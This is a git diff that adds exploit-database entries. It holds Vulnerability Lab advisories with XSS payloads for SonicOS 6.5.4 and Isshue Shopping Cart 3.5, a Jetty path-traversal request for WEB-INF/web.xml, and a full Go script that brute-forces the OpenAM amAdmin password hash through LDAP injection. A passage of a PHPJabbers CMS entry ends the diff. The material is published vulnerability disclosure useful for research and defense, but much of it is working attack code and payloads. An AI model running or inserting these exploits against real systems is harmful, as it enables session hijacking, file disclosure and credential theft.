diff --git a/exploits/hardware/webapps/50485.txt b/exploits/hardware/webapps/50485.txt
new file mode 100644
index 000000000..643b70420
--- /dev/null
+++ b/exploits/hardware/webapps/50485.txt
@@ -0,0 +1,245 @@
+# Exploit Title: Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)
+# Date: 2021-10-18
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://www.sonicguard.com/NSV-800.asp
+# Version: 6.5.4
+
+Document Title:
+===============
+Sonicwall SonicOS 6.5.4 - Cross Site Scripting Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2272
+
+
+Release Date:
+=============
+2021-10-18
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2272
+
+
+Common Vulnerability Scoring System:
+====================================
+5
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Non Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+The design, implementation and deployment of modern network architectures, such as virtualization and cloud, continue to be a game-changing
+strategy for many organizations. Virtualizing the data center, migrating to the cloud, or a combination of both, demonstrates significant
+operational and economic advantages. However, vulnerabilities within virtual environments are well-documented. New vulnerabilities are
+discovered regularly that yield serious security implications and challenges. To ensure applications and services are delivered safely,
+efficiently and in a scalable manner, while still combating threats harmful to all parts of the virtual framework including virtual
+machines (VMs), application workloads and data must be among the top priorities.
+
+(Copy of the Homepage: https://www.sonicguard.com/NSV-800.asp )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a non-persistent cross site scripting web vulnerability in the SonicWall SonicOS 6.5.4.
+
+
+Affected Product(s):
+====================
+Model: SonicWall SonicOS
+Firmware: 6.5.4.4-44v-21-1288-aa5b8b01 (6.5.4)
+OS: SonicOS Enhanced
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-07-24: Researcher Notification & Coordination (Security Researcher)
+2021-07-25: Vendor Notification (Security Department)
+2021-**-**: Vendor Response/Feedback (Security Department)
+2021-**-**: Vendor Fix/Patch (Service Developer Team)
+2021-**-**: Security Acknowledgements (Security Department)
+2021-10-18: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+Medium User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A client-side input validation vulnerability has been discovered in the official SonicWall SonicOS 6.5.4.
+The vulnerability allows remote attackers to hijack sessionc credentials or manipulate client-side requested application content.
+
+The vulnerability is located in the common name input field in the Decryption Service - Common Name - Show Connection Failures module.
+Remote attackers with low privileged user accounts can inject own script codes to compromise session credentials. It is also possible
+to build special crafted html pages with get / post method requests to hijack non-expired user account sessions. The request method to
+inject is get and the attack vector is located on the client-side without being persistent.
+
+Successful exploitation of the vulnerability allows remote attackers to hijack session credentials (non-persistent), phishing
+(non-persistent), external redirect to malicious sources (non-persistent) or client-side application content manipulation.
+Exploitation of the vulnerability requires low or medium user interaction or a low privileged (restricted) user account.
+
+Module(s):
+[+] Decryption Service
+
+
+Vulnerable Function(s):
+[+] Edit (Bearbeiten)
+
+
+Vulnerable Parameter(s):
+[+] Common Name
+
+
+Affected Module(s):
+[+] Show Connection Failures
+
+
+Proof of Concept (PoC):
+=======================
+The client-side cross site scripting web vulnerability can be exploited by remote attackers with user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Login as restricted or privileged user to the sonicWall sonicOS 6.5.4 virtual firewall application
+2. Open the Decryption Service > Common Name > Show Connection Failures
+3. Click on Edit and inject a js test payload into the restricted client content
+4. Pushing anywhere else outsite field will temporarily save the payload
+5. The script code immediately executes in the web browsers context
+5. Successful reproduce of the script code inject web vulnerability!
+
+
+Vulnerable Source: Connection Failure List (getConnFailureList.json)
+<div id="connFailureEntriesDiv" style="overflow-y: scroll; height: 544px;">
+<table summary="" width="100%" cellspacing="0" cellpadding="4" border="0">
+<tbody id="connFailureEntries"><tr><td class="listItem" width="5%"><input type="checkbox"
+id="failChk4181252134" class="failChk" data-id="4181251300" data-name="sfPKI-4411CA162CD7931145552C4C87F9603D55FC.22"
+data-override-name="><iframe src=evil.source onload=alert(document.domain)>" data-failure="7" onclick="onClickFailCheckbox(this);"></td>
+<td class="listItem" width="15%">192.168.XX.XX</td><td class="listItem" width="15%">XX.XX.XX.XX</td>
+<td class="listItem" width="30%">>"<iframe src="evil.source" onload="alert(document.domain)"></iframe></td>
+
+
+
+--- PoC Session Logs (Cookie: SessId=F0FF65AA4C2B22B0655546584DCFAF65) ---
+https://nsv800.localhost:9281/evil.source
+Host: nsv800.localhost:9281
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Referer: https://nsv800.localhost:9281/sslSpyConfigure.html
+Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
+Upgrade-Insecure-Requests: 1
+-
+GET: HTTP/1.0 200 OK
+Server: SonicWALL
+Content-type: text/html;charset=UTF-8
+-
+https://nnsv800.localhost:9281/getJsonData.json?dataSet=alertStatus&_=1625248460727
+Host: nsv800.localhost:9281
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+Referer: https://nsv800.localhost:9281/logo.html
+Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
+-
+GET: HTTP/1.0 200 OK
+Server: SonicWALL
+Content-type: application/json
+Accept-Ranges: bytes
+
+
+Reference(s):
+nsv800.localhost:9281/main.html
+nsv800.localhost:9281/getJsonData.json
+nsv800.localhost:9281/sslSpyConfigure.html
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the client-side reflected script code through getJsonData.json and sslSpyConfigure.
+The input and output parameters needs to be sanitized to prevent script code injects.
+
+
+Security Risk:
+==============
+The security risk of the client-side cross site web vulnerability in the sonicwall sonicos series is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
+LUDWIG-ERHARD STRAßE 4
+34131 KASSEL - HESSEN
+DEUTSCHLAND (DE)
\ No newline at end of file
diff --git a/exploits/java/webapps/50478.txt b/exploits/java/webapps/50478.txt
new file mode 100644
index 000000000..b348b0360
--- /dev/null
+++ b/exploits/java/webapps/50478.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Eclipse Jetty 11.0.5 - Sensitive File Disclosure
+# Date: 2021-11-03
+# Exploit Author: Mayank Deshmukh
+# Vendor Homepage: https://www.eclipse.org/jetty/
+# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/
+# Version: 9.4.37 ≤ version < 9.4.43, 10.0.1 ≤ version < 10.0.6, 11.0.1 ≤ version < 11.0.6
+# Security Advisory: https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
+# Tested on: Kali Linux
+# CVE : CVE-2021-34429
+# Github POC: https://github.com/ColdFusionX/CVE-2021-34429
+
+POC - Access WEB-INF/web.xml
+
+## Request
+
+GET /%u002e/WEB-INF/web.xml HTTP/1.1
+Host: localhost:9006
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+## Response
+
+HTTP/1.1 200 OK
+Connection: close
+Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
+Content-Type: application/xml
+Accept-Ranges: bytes
+Content-Length: 209
+Server: Jetty(11.0.5)
+
+<!DOCTYPE web-app PUBLIC
+ "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
+ "http://java.sun.com/dtd/web-app_2_3.dtd" >
+
+<web-app>
+<display-name>ColdFusionX - Web Application</display-name>
+</web-app>
\ No newline at end of file
diff --git a/exploits/java/webapps/50480.go b/exploits/java/webapps/50480.go
new file mode 100755
index 000000000..f341922ab
--- /dev/null
+++ b/exploits/java/webapps/50480.go
@@ -0,0 +1,253 @@
+# Exploit Title: OpenAM 13.0 - LDAP Injection
+# Date: 03/11/2021
+# Exploit Author: Charlton Trezevant, GuidePoint Security
+# Vendor Homepage: https://www.forgerock.com/
+# Software Link: https://github.com/OpenIdentityPlatform/OpenAM/releases/tag/13.0.0,
+# https://backstage.forgerock.com/docs/openam/13/install-guide/index.html#deploy-openam
+# Version: OpenAM v13.0.0
+# Tested on: go1.17.2 darwin/amd64
+# CVE: CVE-2021-29156
+#
+# This vulnerability allows an attacker to extract a variety of information
+# (such as a user’s password hash) from vulnerable OpenAM servers via LDAP
+# injection, using a character-by-character brute force attack.
+#
+# https://github.com/guidepointsecurity/CVE-2021-29156
+# https://nvd.nist.gov/vuln/detail/CVE-2021-29156
+# https://portswigger.net/research/hidden-oauth-attack-vectors
+
+package main
+
+// All of these dependencies are included in the standard library.
+import (
+	"container/ring"
+	"fmt"
+	"math/rand"
+	"net/http"
+	"net/url"
+	"sync"
+	"time"
+)
+
+func main() {
+	// Base URL of the target OpenAM instance
+	baseURL := "http://localhost/openam/"
+
+	// Local proxy (such as Burp)
+	proxy := "http://localhost:8080/"
+
+	// Username whose hash should be dumped
+	user := "amAdmin"
+
+	// Configurable ratelimit
+	// This script can go very, very fast. But it's likely that would overload Burp and the target server.
+	// The default ratelimit of 6 can retrieve a 60 character hash through a proxy in about 5 minutes and
+	// ~1700 requests.
+	rateLimit := 6
+
+	// Beginning of the LDAP injection payload. %s denotes the position of the username.
+	payloadUsername := fmt.Sprintf(".well-known/webfinger?resource=http://x/%s)", user)
+	partURL := fmt.Sprintf("%s%s", baseURL, payloadUsername)
+
+	// Your LDAP injection payloads. %s denotes the position at which the constructed hash + next test character
+	// will be inserted.
+	// These are configured to dump password hashes. But you can reconfigure them to dump other data, such as
+	// usernames/session IDs/etc depending on your use case.
+	// N.B. you will likely need to update the brute-forcing keyspace depending on the data you're trying to dump.
+	testCharPayload := "(sunKeyValue=userPassword=%s*)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"
+	testCrackedPayload := "(sunKeyValue=userPassword=%s)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"
+
+	// The keyspace for brute-forcing individual characters is stored in a ringbuffer
+	// You may need to change how this is initialized depending on the types of data you're
+	// trying to retrieve. By default, this is configured for password hashes.
+	dict := makeRing()
+
+	// Working characters for each step are concatenated with this string. Further tests are conducted
+	// using this value as it's built.
+	// Importantly, if you already have part of the hash you can put it here as a crib. This allows you
+	// to resume a previous brute-forcing session.
+	password := ""
+
+	proxyURL, _ := url.Parse(proxy)
+
+	// You can modify the HTTP client configuration below.
+	// For example, to disable the HTTP proxy or set a different
+	// request timeout value.
+	client := &http.Client{
+		Transport: &http.Transport{
+			Proxy: http.ProxyURL(proxyURL),
+		},
+		Timeout: 30 * time.Second,
+	}
+
+	// Channels used for internal signaling
+	cracked := make(chan string, 1)
+	foundChar := make(chan string, 1)
+
+	wg := &sync.WaitGroup{}
+	wg.Add(1)
+
+	// All hacking tools need a header. You may experience a 10-15x performance improvement
+	// if you replace the flower-covered header with the gothic bleeding/flaming/skull-covered
+	// ASCII art typical of these kinds of tools.
+	printHeader()
+
+loop:
+	for {
+		select {
+		case <-cracked:
+			// Full hash test succeeds, terminate everything
+			// N.B. this feature does not work, see my comments on checkCracked.
+			fmt.Printf("Cracked! Password hash is: \"%s\"\n", password)
+			wg.Done()
+			break loop
+
+		case char := <-foundChar:
+			// In the event that a test character succeeds, that thread will pass it along in the
+			// foundChar channel to signal success. It's then concatenated with the known-good
+			// password hash and the whole thing is tested in a query
+			// This doesn't work because OpenAM doesn't respond to direct queries containing the password hash
+			// in the manner I expect. But it might still work for other types of data.
+			password += char
+			fmt.Printf("Progress so far: '%s'\n", password)
+
+			// Forgive these very ugly closures
+			go (func(client *http.Client, url, payload *string, password string, cracked *chan string) {
+				// Add random jitter before submitting request
+				time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
+				time.Sleep(1 * time.Second)
+				checkCracked(client, url, payload, &password, cracked)
+			})(client, &partURL, &testCharPayload, password, &cracked)
+
+		default:
+			for i := 0; i < rateLimit-1; i++ {
+				testChar := dict.Value.(string)
+				go (func(client *http.Client, url, payload *string, password, testChar string, foundChar *chan string) {
+					time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
+					time.Sleep(1 * time.Second)
+					getChar(client, url, payload, &password, &testChar, foundChar)
+				})(client, &partURL, &testCrackedPayload, password, testChar, &foundChar)
+				dict = dict.Next()
+			}
+
+			time.Sleep(1 * time.Second)
+		}
+	}
+
+	wg.Wait()
+}
+
+// checkCracked tests a complete string in a query against the OpenAM server to
+// determine whether the exact, full hash has been retrieved.
+// This doesn't actually work, because the server doesn't respond as I'd expect
+// A better implementation would probably watch until all positions in the ringbuffer
+// are exhausted in testing and terminate (since there's no way to progress further)
+func checkCracked(client *http.Client, targetURL, payload, password *string, cracked *chan string) {
+	fullPayload := fmt.Sprintf(*payload, url.QueryEscape(*password))
+	fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)
+
+	req, err := http.NewRequest("GET", fullURL, nil)
+	if err != nil {
+		fmt.Printf("checkCracked: %s", err.Error())
+		return
+	}
+
+	res, err := client.Do(req)
+	if err != nil {
+		fmt.Printf("checkCracked: %s", err.Error())
+		return
+	}
+
+	if res.StatusCode == 200 {
+		*cracked <- *password
+		return
+	}
+
+	if res.StatusCode == 404 {
+		return
+	}
+
+	fmt.Printf("checkCracked: got status code of %d for payload %s", res.StatusCode, payload)
+}
+
+// getChar tests a given character at the end position of the configured payload and dumped hash progress.
+func getChar(client *http.Client, targetURL, payload, password, testChar *string, foundChar *chan string) {
+	// Concatenate test character -> password -> payload -> attack URL
+	combinedPass := url.QueryEscape(fmt.Sprintf("%s%s", *password, *testChar))
+	fullPayload := fmt.Sprintf(*payload, combinedPass)
+	fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)
+
+	req, err := http.NewRequest("GET", fullURL, nil)
+	if err != nil {
+		fmt.Printf("getChar: %s", err.Error())
+		return
+	}
+
+	res, err := client.Do(req)
+	if err != nil {
+		fmt.Printf("getChar: %s", err.Error())
+		return
+	}
+
+	if res.StatusCode == 200 {
+		*foundChar <- *testChar
+		return
+	}
+
+	if res.StatusCode == 404 {
+		return
+	}
+
+	fmt.Printf("getChar: got status code of %d for payload %s", res.StatusCode, payload)
+}
+
+// makeRing instantiates a ringbuffer and initializes it with test characters common in base64
+// and password hash encodings.
+// Bruteforcing on a character-by-character basis can only go as far as your dictionary will take
+// you, so be sure to update these strings if the keyspace for your use case is different.
+func makeRing() *ring.Ring {
+	var upcase string = `ABCDEFGHIJKLMNOPQRSTUVWXYZ`
+	var lcase string = `abcdefghijklmnopqrstuvwxyz`
+	var num string = `1234567890`
+	var punct string = `$+/.=`
+
+	var dictionary string = upcase + lcase + num + punct
+
+	buf := ring.New(len(dictionary))
+
+	for _, c := range dictionary {
+		buf.Value = fmt.Sprintf("%c", c)
+		buf = buf.Next()
+	}
+
+	return buf
+}
+
+// printHeader is cool.
+func printHeader() {
+	fmt.Printf(`
+
+											    _______  ,---.  ,---.   .-''-.
+											   /   __  \ |   /  |   | .'_ _   \
+											  | ,_/  \__)|  |   |  .'/ ( ' )   '
+											,-./  )      |  | _ |  |. (_ o _)  |
+											\  '_ '')    |  _( )_  ||  (_,_)___|
+											 > (_)  )  __\ (_ o._) /'  \   .---.
+											(  .  .-'_/  )\ (_,_) /  \  '-'    /
+											 '-''-'     /  \     /    \       /
+											   '._____.'    '---'      ''-..-'
+
+    .'''''-.   .-'''''''-.     .'''''-.     ,---.                 .'''''-.    .-''''-.    ,---. ,--------.    .------.  .---.
+   /   ,-.  \ / ,'''''''. \   /   ,-.  \   /_   |                /   ,-.  \  /  _ _   \  /_   | |   _____|   /  .-.   \ \   /
+  (___/  |   ||/ .-./ )  \|  (___/  |   |    ,_ |               (___/  |   ||  ( ' )  |    ,_ | |  )        /  /   '--' |   |
+        .'  / || \ '_ .')||        .'  / ,-./  )|   _ _    _ _        .'  / | (_{;}_) |,-./  )| |  '----.   |  .----.    \ /
+    _.-'_.-'  ||(_ (_) _)||    _.-'_.-'  \  '_ '') ( ' )--( ' )   _.-'_.-'  |  (_,_)  |\  '_ '')|_.._ _  '. |   _ _  '.   v
+  _/_  .'     ||  / .  \ ||  _/_  .'      > (_)  )(_{;}_)(_{;}_)_/_  .'      \        | > (_)  )   ( ' )   \|  ( ' )   \ _ _
+ ( ' )(__..--.||  '-''"' || ( ' )(__..--.(  .  .-' (_,_)--(_,_)( ' )(__..--.  '----'  |(  .  .-' _(_{;}_)  || (_{;}_)  |(_I_)
+(_{;}_)      |\'._______.'/(_{;}_)      | '-''-'|             (_{;}_)      |  .--. /  / '-''-'| |  (_,_)  / \  (_,_)  /(_(=)_)
+ (_,_)-------' '._______.'  (_,_)-------'   '---'              (_,_)-------'  )_____.'    '---'  '...__..'   '...__..'  (_I_)
+
+ 				~ ~ (c) 2021 GuidePoint Security - charlton.trezevant@guidepointsecurity.com ~ ~
+
+`)
+}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50490.txt b/exploits/multiple/webapps/50490.txt
new file mode 100644
index 000000000..a82db7818
--- /dev/null
+++ b/exploits/multiple/webapps/50490.txt
@@ -0,0 +1,231 @@
+# Exploit Title: Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)
+# Date: 2021-10-22
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/
+# Version: 3.5
+
+Document Title:
+===============
+Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2284
+
+
+Release Date:
+=============
+2021-10-22
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2284
+
+
+Common Vulnerability Scoring System:
+====================================
+5.1
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Multi-store eCommerce shopping cart software is the complete solution for eCommerce business management. It is all in one package for website management
+with backend admin panel to manage inventory, order, product, invoicing & so on. No need regular monthly subscription fee, get it through one-time payment now.
+Your eCommerce business frequently changes with the times. All you need is a system that will make your work easier and time-saving. You need the best
+eCommerce shopping cart software which is flexible, upgradable, affordable. Isshue is a completely secure and fast eCommerce POS system for eCommerce
+solutions. Isshue is the best choice for any type of e-commerce business, big or small.
+
+(Copy of the Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent validation vulnerability in the Isshue eCommerce Shopping Cart v3.5 web-application.
+
+
+Affected Product(s):
+====================
+bdtask
+Product: Isshue Shopping Cart v3.5 - eCommerce (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-08-23: Researcher Notification & Coordination (Security Researcher)
+2021-08-24: Vendor Notification (Security Department)
+2021-**-**: Vendor Response/Feedback (Security Department)
+2021-**-**: Vendor Fix/Patch (Service Developer Team)
+2021-**-**: Security Acknowledgements (Security Department)
+2021-10-22: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Moderator Privileges)
+
+
+User Interaction:
+=================
+Medium User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in the official Isshue eCommerce Shopping Cart v3.5 web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+A input validation web vulnerability has been discovered in the title input fields in `new invoice`, `customer` & `stock` modules.
+The `title` input and parameter allows to inject own malicious script code with persistent attack vector. The content of the input
+and parameter is insecure validated, thus allows remote attackers with privileged user accounts (manager/keeper/admin) to inject
+own malformed script code that executes on preview. The request method to inject is post and the attack vector is persistent on
+the application-side.
+
+Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects
+to malicious source and persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Edit Title
+
+Vulnerable Input(s):
+[+] Title
+
+Vulnerable Parameter(s):
+[+] title
+
+Affected Module(s):
+[+] stock
+[+] customer
+[+] invoice
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerability can be exploited by remote attackers with keeper account and with low user interaction.
+For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
+
+
+Vulnerable Source:
+<div class="row">
+<div class="col-sm-12 lobipanel-parent-sortable ui-sortable" data-lobipanel-child-inner-id="azO1Fsrq9M">
+<div class="panel panel-bd lobidrag lobipanel lobipanel-sortable" data-inner-id="azO1Fsrq9M" data-index="0">
+<div class="panel-heading ui-sortable-handle">
+<div class="panel-title" style="max-width: calc(100% - 180px);">"[MALICIOUS INJECTED SCRIPT CODE!]<iframe src="evil.source" onload="alert(document.cookie)"></iframe></div>
+<div class="dropdown"><ul class="dropdown-menu dropdown-menu-right"><li><a data-func="editTitle" data-tooltip="Edit title"
+data-toggle="tooltip" data-title="Edit title" data-placement="bottom" data-original-title="" title=""><i class="panel-control-icon ti-pencil"></i>
+<span class="control-title">Edit title</span></a></li><li>
+<a data-func="unpin" data-tooltip="Unpin" data-toggle="tooltip" data-title="Unpin" data-placement="bottom" data-original-title="" title="">
+<i class="panel-control-icon ti-move"></i><span class="control-title">Unpin</span></a></li><li>
+<a data-func="reload" data-tooltip="Reload" data-toggle="tooltip" data-title="Reload" data-placement="bottom" data-original-title="" title="">
+<i class="panel-control-icon ti-reload"></i><span class="control-title">Reload</span></a></li><li>
+<a data-func="minimize" data-tooltip="Minimize" data-toggle="tooltip" data-title="Minimize" data-placement="bottom" data-original-title="" title="">
+<i class="panel-control-icon ti-minus"></i><span class="control-title">Minimize</span></a></li><li><a data-func="expand"
+data-tooltip="Fullscreen" data-toggle="tooltip" data-title="Fullscreen" data-placement="bottom" data-original-title="" title="">
+<i class="panel-control-icon ti-fullscreen"></i><span class="control-title">Fullscreen</span></a></li><li>
+<a data-func="close" data-tooltip="Close" data-toggle="tooltip" data-title="Close" data-placement="bottom" data-original-title="" title="">
+<i class="panel-control-icon ti-close"></i><span class="control-title">Close</span></a></li></ul>
+<div class="dropdown-toggle" data-toggle="dropdown"><span class="panel-control-icon glyphicon glyphicon-cog"></span></div></div></div>
+<form action="https://isshue.bdtask.com/isshue_v4_demo4/dashboard/Store_invoice/new_invoice" class="form-vertical" id="validate" name="insert_invoice" enctype="multipart/form-data" method="post" accept-charset="utf-8" novalidate="novalidate">
+<div class="panel-body">
+<div class="row">
+<div class="col-sm-8" id="payment_from_1">
+<div class="form-group row">
+<label for="customer_name" class="col-sm-3 col-form-label">Customer Name <i class="text-danger">*</i></label>
+<div class="col-sm-6">
+<input type="text" size="100" value="a as" name="customer_name" class="customerSelection form-control ui-autocomplete-input" placeholder="Customer Name" id="customer_name" autocomplete="off">
+<input id="SchoolHiddenId" value="HW77BA6CZEJXCV8" class="customer_hidden_value" type="hidden" name="customer_id">
+</div>
+
+
+--- PoC Session Logs (GET) [Execute] ---
+https://isshue.localhost:8080/isshue/dashboard/Store_invoice/evil.source
+Host: isshue.localhost:8080
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer: https://isshue.localhost:8080/isshue/dashboard/Store_invoice/new_invoice
+Cookie: ci_session=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de-
+1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==
+-
+GET: HTTP/2.0 200 OK
+content-type: text/html; charset=UTF-8
+vary: Accept-Encoding
+set-cookie: cookie=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de-
+1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==; GMT; Max-Age=7200; path=/
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerability in the shopping cart web-application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
+LUDWIG-ERHARD STRAßE 4
+34131 KASSEL - HESSEN
+DEUTSCHLAND (DE)
\ No newline at end of file
diff --git a/exploits/php/webapps/50475.txt b/exploits/php/webapps/50475.txt
new file mode 100644
index 000000000..325cbc124
--- /dev/null
+++ b/exploits/php/webapps/50475.txt
@@ -0,0 +1,260 @@
+# Exploit Title: PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)
+# Google Dork: subtitle:Copyright © 2021 PHPJabbers.com
+# Date: 2021-10-28
+# Exploit Author: Vulnerability-Lab
+# Vendor Homepage: https://www.phpjabbers.com/faq.php
